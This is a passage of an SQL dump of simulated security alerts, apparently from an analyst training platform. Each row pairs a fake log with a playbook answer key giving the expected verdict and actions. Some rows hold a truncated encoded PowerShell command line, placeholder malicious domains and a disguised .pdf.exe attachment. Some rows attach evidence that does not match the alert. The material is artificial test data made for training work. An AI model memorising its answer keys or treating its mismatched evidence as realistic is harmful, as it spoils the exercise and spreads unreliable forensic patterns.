2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:45:10Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"domain\\\":\\\"xkjasd1234.info\\\",\\\"username\\\":\\\"svc-backup\\\",\\\"hostname\\\":\\\"SRV-BACKUP01\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.258Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:45:10Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"domain\\\":\\\"xkjasd1234.info\\\",\\\"username\\\":\\\"svc-backup\\\",\\\"hostname\\\":\\\"SRV-BACKUP01\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.258Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:45:10Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"domain\\\":\\\"xkjasd1234.info\\\",\\\"username\\\":\\\"svc-backup\\\",\\\"hostname\\\":\\\"SRV-BACKUP01\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(619, 'False Positive: Suspicious Login Attempt from Known Safe Location', 'medium', 'IDS', 'Multiple login failures were detected from an external IP. However, the IP belongs to a known safe location used by a trusted vendor.', 'Credential Attack', 'T1110', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T08:50:42Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.44\",\"dst_ip\":\"192.168.100.5\",\"username\":\"jdoe\",\"hostname\":\"CORP-DC01\",\"failed_attempts\":12}', '2026-01-11 00:32:19', '2026-02-17 05:27:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.44\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP address belongs to a known safe location used by a trusted vendor\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.100.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of domain controller\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login failures originated from a trusted vendor\'s network, confirming benign activity.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.259Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.44\\\",\\\"dst_ip\\\":\\\"192.168.100.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC01\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-02-01T20:31:22.259Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.44\\\",\\\"dst_ip\\\":\\\"192.168.100.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC01\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-02-01T20:30:22.259Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.44\\\",\\\"dst_ip\\\":\\\"192.168.100.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC01\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-02-01T20:29:22.259Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.44\\\",\\\"dst_ip\\\":\\\"192.168.100.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC01\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-02-01T20:28:22.259Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.44\\\",\\\"dst_ip\\\":\\\"192.168.100.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC01\\\",\\\"failed_attempts\\\":12}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(620, 'Phishing Attempt Detected: Spoofed Domain and Malicious URL', 'high', 'Proofpoint', 'A phishing email was received with a spoofed domain and a malicious URL designed to harvest credentials.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:58Z\",\"event_type\":\"email_received\",\"email_sender\":\"noreply@secure-update.com\",\"username\":\"asmith\",\"hostname\":\"CORP-LAPTOP03\",\"url\":\"http://secure-update.com/login\",\"domain\":\"secure-update.com\"}', '2026-01-11 09:03:00', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"noreply@secure-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Sender domain spoofed to resemble a legitimate service\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-update.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL identified as phishing site designed to harvest credentials\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"secure-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain reported for phishing activities\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"block_domain\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email\'s spoofed domain and the malicious URL were clearly intended for phishing, confirming the threat.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt Detected: Spoofed Domain and Malicious URL\",\"date\":\"2026-02-01T20:32:22.260Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(621, 'Malware Detected: Known Malicious File Executed', 'critical', 'CrowdStrike', 'A malicious file with a known bad hash was executed on a host system. The file is flagged by multiple antivirus engines indicating its high threat level.', 'Malware', 'T1059', 1, 'Closed', 96, '{\"timestamp\":\"2026-01-11T10:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1A2B3C\",\"command_line\":\"C:\\\\malware\\\\badfile.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"domain\":\"maliciousdomain.com\"}', '2026-01-09 22:10:29', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected as malicious by over 50 antivirus engines.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain is associated with known malware distribution.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of a known malicious file hash confirms this is a true positive malware event.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(622, 'Critical Malware Detected: Trojan Executed on Host', 'critical', 'CrowdStrike', 'A known Trojan malware was executed on the host machine. The file hash matches a known malicious hash with 50+ detections on VirusTotal.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.45\",\"username\":\"john.doe\",\"hostname\":\"DESKTOP-ABC123\",\"command_line\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Roaming\\\\evil.exe\",\"file_hash\":\"1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef\"}', '2026-01-11 14:07:44', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 60 out of 70 antivirus engines\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Roaming\\\\evil.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution of known Trojan\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detected file and external IP are confirmed malicious based on multiple OSINT sources, indicating a true positive malware infection.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(623, 'Critical Malware Detected on Medical Device', 'critical', 'CrowdStrike', 'A known malware signature was detected on a hospital\'s medical device, potentially compromising patient data. Immediate action is required to isolate the device to prevent data exfiltration.', 'Malware', 'T1059', 1, 'closed', NULL, '{\"timestamp\":\"2026-01-11T08:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"\",\"username\":\"nurse.jones\",\"hostname\":\"med-device-01\",\"command_line\":\"C:\\\\malware\\\\ransomware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"domain\":\"\",\"url\":\"\",\"email_sender\":\"\"}', '2026-01-11 14:47:48', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected by 60+ AV engines as ransomware\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised device\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\malware\\\\ransomware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Malicious executable triggered on the device\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash is widely recognized as malware, indicating a true positive. Immediate isolation of the device is necessary to prevent further compromise.\"}', 'Novice', 'EDR', 1, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(624, 'Brute Force Attack on EHR System', 'high', 'Wazuh', 'Multiple failed login attempts detected on the Electronic Health Record (EHR) system from a suspicious IP address, suggesting a brute force attack.', 'Brute Force', 'T1110', 0, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.2.10\",\"username\":\"admin\",\"hostname\":\"ehr-server-01\",\"request_body\":\"\",\"command_line\":\"\",\"failed_attempts\":25}', '2026-01-11 14:47:48', '2026-02-15 08:28:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of EHR server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Admin account targeted in brute force attack\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP is known for malicious activity, confirming a true positive brute force attempt. The admin account should have its credentials reset to prevent unauthorized access.\"}', 'Novice', 'SIEM', 1, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.2.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ehr-server-01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:31:22.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.2.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ehr-server-01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:30:22.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.2.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ehr-server-01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:29:22.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.2.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ehr-server-01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:28:22.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.2.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ehr-server-01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(625, 'Brute Force Attack Detected from Malicious IP', 'high', 'CrowdStrike', 'A series of failed login attempts were detected from an external IP address known for malicious activities.', 'Brute Force', 'T1110', 1, 'Closed', 95, '{\"timestamp\":\"2026-01-11T09:15:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"CORP-WORKSTATION1\",\"failed_attempts\":35}', '2026-01-10 01:20:02', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Known user account within the organization\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address has a known history of brute force attacks, confirming this as a true positive.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(626, 'Malware Detected via EDR Signature', 'critical', 'Carbon Black', 'A malware file with a known signature was detected on a corporate workstation.', 'Malware', 'T1105', 1, 'investigating', 74, '{\"timestamp\":\"2026-01-11T10:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.11\",\"dst_ip\":\"\",\"username\":\"asmith\",\"hostname\":\"CORP-WORKSTATION2\",\"command_line\":\"C:\\\\malware\\\\evil.exe\",\"file_hash\":\"abcd1234efgh5678ijkl9012mnopqrst\"}', '2026-01-10 11:52:11', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"abcd1234efgh5678ijkl9012mnopqrst\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected as malware by 65 antivirus engines\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malware\\\\evil.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual file execution path\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash matches known malware signatures, confirming this as a true positive.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.266Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.11\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION2\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\evil.exe\\\",\\\"file_hash\\\":\\\"abcd1234efgh5678ijkl9012mnopqrst\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.266Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.11\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION2\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\evil.exe\\\",\\\"file_hash\\\":\\\"abcd1234efgh5678ijkl9012mnopqrst\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.266Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.11\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION2\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\evil.exe\\\",\\\"file_hash\\\":\\\"abcd1234efgh5678ijkl9012mnopqrst\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.266Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.11\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION2\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\evil.exe\\\",\\\"file_hash\\\":\\\"abcd1234efgh5678ijkl9012mnopqrst\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.266Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 